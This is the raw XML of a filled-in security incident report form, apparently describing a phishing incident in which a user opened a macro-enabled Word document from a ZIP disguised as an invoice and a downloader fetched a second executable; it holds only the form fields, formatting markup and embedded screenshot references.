                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1 user (Jayne).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB4A08" w:rsidRPr="00144557" w14:paraId="0F2A3E33" w14:textId="77777777" w:rsidTr="00F72AAA">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135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2F9329B8" w14:textId="253B1004" w:rsidR="00FB4A08" w:rsidRPr="00144557" w:rsidRDefault="00047AFF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there a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ny known data loss or </w:t>
            </w:r>
            <w:r w:rsidR="00F72AAA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xposure?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3BB44E3D" w14:textId="77777777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FB4A08" w:rsidRPr="00144557" w14:paraId="00DA1253" w14:textId="77777777" w:rsidTr="000077E5">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62A0DB4E" w14:textId="6786C4F3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986047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4557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900" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="500A22B1" w14:textId="46C1CCE2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12076448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A7A80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7020" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FE1B499" w14:textId="77777777" w:rsidR="00FB4A08" w:rsidRPr="00144557" w:rsidRDefault="00FB4A08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FB4A08" w:rsidRPr="00144557" w14:paraId="469ECF4D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8FDAB3B" w14:textId="4801CB6B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If yes, describe the type of data (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e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.g., personal info, credentials, financial)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FB4A08" w:rsidRPr="00144557" w14:paraId="32A82D78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5838C3F" w14:textId="0F719E32" w:rsidR="00FB4A08" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Currently, no data exfiltration is visible in the provided logs. The primary action was a downloader fetching a secondary executable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C39DF41" w14:textId="77777777" w:rsidR="009D733E" w:rsidRPr="00144557" w:rsidRDefault="009D733E" w:rsidP="006332C1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic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8"/>
        <w:gridCol w:w="3618"/>
        <w:gridCol w:w="3584"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016120B" w:rsidRPr="0016120B" w14:paraId="2982FDE5" w14:textId="77777777" w:rsidTr="000077E5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67725DBD" w14:textId="3F5987EE" w:rsidR="005F5FBC" w:rsidRPr="0016120B" w:rsidRDefault="005F5FBC" w:rsidP="005F5FBC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Preliminary Analysis</w:t>
            </w:r>
            <w:r w:rsidRPr="0016120B">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0016120B">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(Optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5FBC" w:rsidRPr="00144557" w14:paraId="06352222" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2152F2B1" w14:textId="07E5A34A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Suspected cause or entry point (e.g., phishing email, unpatched software)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5F5FBC" w:rsidRPr="00144557" w14:paraId="0B637587" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890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B8C0AE6" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Suspected cause or entry point (e.g., phishing email, unpatched software):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768B1ABA" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Social engineering/phishing. The user was lured into downloading and extracting a ZIP file disguised as an invoice, and subsequently opened the macro-enabled Word document, which initiated the malware execution chain.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6B1DCF" w14:textId="77777777" w:rsidR="005F5FBC" w:rsidRPr="00144557" w:rsidRDefault="005F5FBC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5F5FBC" w:rsidRPr="00144557" w14:paraId="05A9130C" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1089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01A08208" w14:textId="7C7B1220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 threat internal, external, or unknown?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB4A08" w:rsidRPr="00144557" w14:paraId="0AAFBEC8" w14:textId="77777777" w:rsidTr="000077E5">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3688" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FF7B12D" w14:textId="3708529F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03323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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3618" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C54DCCC" w14:textId="0AFDC62F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528604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A7A80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External</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3584" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="424C784B" w14:textId="043DA8C1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154112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Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A5FC76D" w14:textId="77777777" w:rsidR="005F5FBC" w:rsidRPr="00144557" w:rsidRDefault="005F5FBC" w:rsidP="006332C1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA02957" w14:textId="77777777" w:rsidR="00144557" w:rsidRPr="00144557" w:rsidRDefault="00144557" w:rsidP="006332C1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEC3E37" w14:textId="7577D4B8" w:rsidR="00144557" w:rsidRPr="00144557" w:rsidRDefault="00144557" w:rsidP="00144557">
      <w:pPr>
        <w:pStyle w:val="p1"/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</w:pP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 xml:space="preserve">Submitted </w:t>
      </w:r>
      <w:r w:rsidR="00047AFF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b</w:t>
      </w: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y:</w:t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6332C1" w:rsidRPr="00144557" w14:paraId="750CFE78" w14:textId="77777777" w:rsidTr="00144557">
        <w:trPr>
          <w:trHeight w:val="720"/>
        </w:trPr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6B4FED9E" w14:textId="447A7E2D" w:rsidR="006332C1" w:rsidRPr="00144557" w:rsidRDefault="000D0459" w:rsidP="000D0459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D0459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745BB4FD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7D3B5201" w14:textId="3355D62F" w:rsidR="006332C1" w:rsidRPr="00144557" w:rsidRDefault="000D0459" w:rsidP="000D0459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D0459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67C5F98E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bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3103ACE8" w14:textId="0E8B38A8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144557" w:rsidRPr="00144557" w14:paraId="234FB94A" w14:textId="77777777" w:rsidTr="00144557">
        <w:trPr>
          <w:trHeight w:val="288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6887337A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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="25CECD20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09A01D7E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Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5E982E95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0F3FF2BB" w14:textId="5C68826B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36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Date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 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ubmitted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E2E5198" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="99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26"/>
        <w:gridCol w:w="236"/>
        <w:gridCol w:w="236"/>
        <w:gridCol w:w="236"/>
        <w:gridCol w:w="236"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA7A80" w:rsidRPr="00144557" w14:paraId="5DC93C61" w14:textId="77777777" w:rsidTr="00EA7A80">
        <w:trPr>
          <w:trHeight w:val="288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2D7BAB41" w14:textId="05859205" w:rsidR="00EA7A80" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80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7C65AD88" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80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63BF4133" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80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3B35390A" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80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03DA039C" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="2F7C491D" w14:textId="57BA1243" w:rsidR="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E3FA4B" wp14:editId="2228CD37">
            <wp:extent cx="7061200" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="1061484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2052" cy="397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4EA62" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="3EC87553" w14:textId="6816034F" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02097A0D" wp14:editId="27C3EB5B">
            <wp:extent cx="7061200" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="837863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2050" cy="397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C70D4" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="77A9AF9A" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="1B1DAACD" w14:textId="00DEB06D" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B82961E" wp14:editId="7315D61C">
            <wp:extent cx="7027333" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1353376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8613" cy="395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4ABD1" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="52A36190" w14:textId="7C968A75" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507357D8" wp14:editId="32C96433">
            <wp:extent cx="7095067" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1729690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138" cy="399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CC05D" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="7400420D" w14:textId="23D171B5" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C6A65C" wp14:editId="40CA7A7A">
            <wp:extent cx="7078133" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="387804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448" cy="3982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3E258" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="78F031AD" w14:textId="25813A92" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DCB988B" wp14:editId="116091EA">
            <wp:extent cx="7128933" cy="4010025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129008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0438" cy="4010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CB84" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="394E3B6C" w14:textId="57CE2C3F" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0F3B65" wp14:editId="73334810">
            <wp:extent cx="7095067" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3407284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763" cy="3991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6C411" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="4D3D1AFC" w14:textId="488BC83A" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD9C1D6" wp14:editId="564A15CD">
            <wp:extent cx="7145867" cy="4019550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15279754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7972" cy="402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8579" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="4B4C2D4E" w14:textId="41EA6AF8" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CFF36D5" wp14:editId="08D108C5">
            <wp:extent cx="7179733" cy="4038600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19246570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2071" cy="403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7ABE0" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:p w14:paraId="646E82A7" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80"/>
    <w:sectPr w:rsidR="00EA7A80" w:rsidSect="007D523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F76B8" w14:textId="77777777" w:rsidR="00754C2B" w:rsidRDefault="00754C2B" w:rsidP="003E66B3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="545A73F8" w14:textId="77777777" w:rsidR="00754C2B" w:rsidRDefault="00754C2B" w:rsidP="003E6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B0D16" w14:textId="77777777" w:rsidR="00754C2B" w:rsidRDefault="00754C2B" w:rsidP="003E66B3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="203991AB" w14:textId="77777777" w:rsidR="00754C2B" w:rsidRDefault="00754C2B" w:rsidP="003E6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72CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6316A2F0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22181A16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCC2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0433A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A626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00A41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B2A5352"/>
    <w:lvl w:ilvl="0" w:tplc="3AFA0D16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46011E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2358347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7656D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B57E28F6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51B97490"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="088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51533"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="185CD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623D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09A6965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910851">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="599338481">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1630013764">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="736172365">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1833107530">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2132820859">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1541438487">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="908265767">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="9719085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57"/>
    <w:rsid w:val="000049D3"/>
    <w:rsid w:val="000077E5"/>
    <w:rsid w:val="000150DB"/>
    <w:rsid w:val="000201BC"/>
    <w:rsid w:val="00024C26"/>
    <w:rsid w:val="00036E32"/>
    <w:rsid w:val="00045D4F"/>
    <w:rsid w:val="00047AFF"/>
    <w:rsid w:val="00055BBE"/>
    <w:rsid w:val="00055FF9"/>
    <w:rsid w:val="00065F6A"/>
    <w:rsid w:val="00067ADF"/>
    <w:rsid w:val="000713ED"/>
    <w:rsid w:val="00081992"/>
    <w:rsid w:val="00086EA1"/>
    <w:rsid w:val="000872A8"/>
    <w:rsid w:val="000971E0"/>
    <w:rsid w:val="00097972"/>
    <w:rsid w:val="000B190C"/>
    <w:rsid w:val="000C1A07"/>
    <w:rsid w:val="000C52BC"/>
    <w:rsid w:val="000D0459"/>
    <w:rsid w:val="000F6F54"/>
    <w:rsid w:val="000F7446"/>
    <w:rsid w:val="001047AA"/>
    <w:rsid w:val="00106A13"/>
    <w:rsid w:val="001078F1"/>
    <w:rsid w:val="00120283"/>
    <w:rsid w:val="0012424F"/>
    <w:rsid w:val="0013032D"/>
    <w:rsid w:val="00130A79"/>
    <w:rsid w:val="001368B9"/>
    <w:rsid w:val="00137D81"/>
    <w:rsid w:val="0014373E"/>
    <w:rsid w:val="00144557"/>
    <w:rsid w:val="00150BBF"/>
    <w:rsid w:val="001516BA"/>
    <w:rsid w:val="001519CA"/>
    <w:rsid w:val="001524EE"/>
    <w:rsid w:val="0015271A"/>
    <w:rsid w:val="00157AD8"/>
    <w:rsid w:val="0016120B"/>
    <w:rsid w:val="0016419D"/>
    <w:rsid w:val="00165CEA"/>
    <w:rsid w:val="00170AEE"/>
    <w:rsid w:val="00183426"/>
    <w:rsid w:val="0019478D"/>
    <w:rsid w:val="001A4B52"/>
    <w:rsid w:val="001B5D11"/>
    <w:rsid w:val="001C0AF7"/>
    <w:rsid w:val="001C1BF9"/>
    <w:rsid w:val="001C1C7F"/>
    <w:rsid w:val="001C3978"/>
    <w:rsid w:val="001C58C4"/>
    <w:rsid w:val="001C7739"/>
    <w:rsid w:val="001D5D34"/>
    <w:rsid w:val="001E1AFB"/>
    <w:rsid w:val="001E3181"/>
    <w:rsid w:val="001E5037"/>
    <w:rsid w:val="001E5E07"/>
    <w:rsid w:val="001F038A"/>
    <w:rsid w:val="001F6F44"/>
    <w:rsid w:val="002036A5"/>
    <w:rsid w:val="00213307"/>
    <w:rsid w:val="00262913"/>
    <w:rsid w:val="0026631F"/>
    <w:rsid w:val="00266586"/>
    <w:rsid w:val="00271937"/>
    <w:rsid w:val="00273A6F"/>
    <w:rsid w:val="00275C68"/>
    <w:rsid w:val="0028781B"/>
    <w:rsid w:val="00295761"/>
    <w:rsid w:val="002A0772"/>
    <w:rsid w:val="002A70AD"/>
    <w:rsid w:val="002B4C42"/>
    <w:rsid w:val="002C521D"/>
    <w:rsid w:val="002D21FF"/>
    <w:rsid w:val="002D6FA3"/>
    <w:rsid w:val="002D7AD5"/>
    <w:rsid w:val="002F0FE7"/>
    <w:rsid w:val="003066A9"/>
    <w:rsid w:val="00306A22"/>
    <w:rsid w:val="00306ACB"/>
    <w:rsid w:val="0032261F"/>
    <w:rsid w:val="00333EDC"/>
    <w:rsid w:val="0033796B"/>
    <w:rsid w:val="0035598A"/>
    <w:rsid w:val="00366CAC"/>
    <w:rsid w:val="00373F9B"/>
    <w:rsid w:val="003758AE"/>
    <w:rsid w:val="00376F90"/>
    <w:rsid w:val="00391FE0"/>
    <w:rsid w:val="00394317"/>
    <w:rsid w:val="0039772D"/>
    <w:rsid w:val="003A4260"/>
    <w:rsid w:val="003A4F30"/>
    <w:rsid w:val="003A53E2"/>
    <w:rsid w:val="003B285F"/>
    <w:rsid w:val="003B6C7E"/>
    <w:rsid w:val="003C0085"/>
    <w:rsid w:val="003C07C6"/>
    <w:rsid w:val="003C1940"/>
    <w:rsid w:val="003C6E62"/>
    <w:rsid w:val="003D2401"/>
    <w:rsid w:val="003D5939"/>
    <w:rsid w:val="003D6017"/>
    <w:rsid w:val="003E49C3"/>
    <w:rsid w:val="003E66B3"/>
    <w:rsid w:val="00407D80"/>
    <w:rsid w:val="00422E7E"/>
    <w:rsid w:val="00423F27"/>
    <w:rsid w:val="00426575"/>
    <w:rsid w:val="00431E2F"/>
    <w:rsid w:val="00446E9C"/>
    <w:rsid w:val="00447D2B"/>
    <w:rsid w:val="004502BC"/>
    <w:rsid w:val="004513ED"/>
    <w:rsid w:val="004525CB"/>
    <w:rsid w:val="00457D38"/>
    <w:rsid w:val="0047391A"/>
    <w:rsid w:val="004752BB"/>
    <w:rsid w:val="0049318B"/>
    <w:rsid w:val="00497933"/>
    <w:rsid w:val="004A5910"/>
    <w:rsid w:val="004B69FB"/>
    <w:rsid w:val="004C47BE"/>
    <w:rsid w:val="004D31B5"/>
    <w:rsid w:val="004F3DE6"/>
    <w:rsid w:val="004F45AB"/>
    <w:rsid w:val="005000F4"/>
    <w:rsid w:val="005072B4"/>
    <w:rsid w:val="00521C4F"/>
    <w:rsid w:val="00523320"/>
    <w:rsid w:val="00523BAA"/>
    <w:rsid w:val="005271C3"/>
    <w:rsid w:val="00531D3B"/>
    <w:rsid w:val="005349F5"/>
    <w:rsid w:val="00534B59"/>
    <w:rsid w:val="00542219"/>
    <w:rsid w:val="00553055"/>
    <w:rsid w:val="0055486A"/>
    <w:rsid w:val="00562053"/>
    <w:rsid w:val="00565356"/>
    <w:rsid w:val="00565CD3"/>
    <w:rsid w:val="00567235"/>
    <w:rsid w:val="0058124A"/>
    <w:rsid w:val="00583006"/>
    <w:rsid w:val="00591B90"/>
    <w:rsid w:val="005958AF"/>
    <w:rsid w:val="005A4733"/>
    <w:rsid w:val="005B24EF"/>
    <w:rsid w:val="005B45F4"/>
    <w:rsid w:val="005B6981"/>
    <w:rsid w:val="005C257A"/>
    <w:rsid w:val="005C7B6E"/>
    <w:rsid w:val="005D0ACF"/>
    <w:rsid w:val="005D1696"/>
    <w:rsid w:val="005D1B28"/>
    <w:rsid w:val="005D49D2"/>
    <w:rsid w:val="005E3778"/>
    <w:rsid w:val="005E732F"/>
    <w:rsid w:val="005F00C7"/>
    <w:rsid w:val="005F5FBC"/>
    <w:rsid w:val="00601D35"/>
    <w:rsid w:val="00603841"/>
    <w:rsid w:val="00604657"/>
    <w:rsid w:val="0061539C"/>
    <w:rsid w:val="00617CCC"/>
    <w:rsid w:val="00620121"/>
    <w:rsid w:val="00623E9A"/>
    <w:rsid w:val="0063207C"/>
    <w:rsid w:val="006332C1"/>
    <w:rsid w:val="00635ABA"/>
    <w:rsid w:val="00643F23"/>
    <w:rsid w:val="00654D68"/>
    <w:rsid w:val="00655DB3"/>
    <w:rsid w:val="00661CDE"/>
    <w:rsid w:val="00662DFB"/>
    <w:rsid w:val="00666EC2"/>
    <w:rsid w:val="0069434C"/>
    <w:rsid w:val="0069643E"/>
    <w:rsid w:val="00697EA7"/>
    <w:rsid w:val="006B0845"/>
    <w:rsid w:val="006C149F"/>
    <w:rsid w:val="006C5F33"/>
    <w:rsid w:val="006D658A"/>
    <w:rsid w:val="006D7682"/>
    <w:rsid w:val="006E49B7"/>
    <w:rsid w:val="006E6AE3"/>
    <w:rsid w:val="006F3B08"/>
    <w:rsid w:val="00704755"/>
    <w:rsid w:val="00707121"/>
    <w:rsid w:val="007148C3"/>
    <w:rsid w:val="007234C2"/>
    <w:rsid w:val="00732980"/>
    <w:rsid w:val="0073457C"/>
    <w:rsid w:val="00741164"/>
    <w:rsid w:val="007425F5"/>
    <w:rsid w:val="00745CBD"/>
    <w:rsid w:val="00753347"/>
    <w:rsid w:val="00754C2B"/>
    <w:rsid w:val="00757E2C"/>
    <w:rsid w:val="00763500"/>
    <w:rsid w:val="007672FD"/>
    <w:rsid w:val="00774373"/>
    <w:rsid w:val="00785D55"/>
    <w:rsid w:val="00791828"/>
    <w:rsid w:val="007A1FE4"/>
    <w:rsid w:val="007A3AA0"/>
    <w:rsid w:val="007B68E0"/>
    <w:rsid w:val="007C0AAF"/>
    <w:rsid w:val="007C279C"/>
    <w:rsid w:val="007D0E43"/>
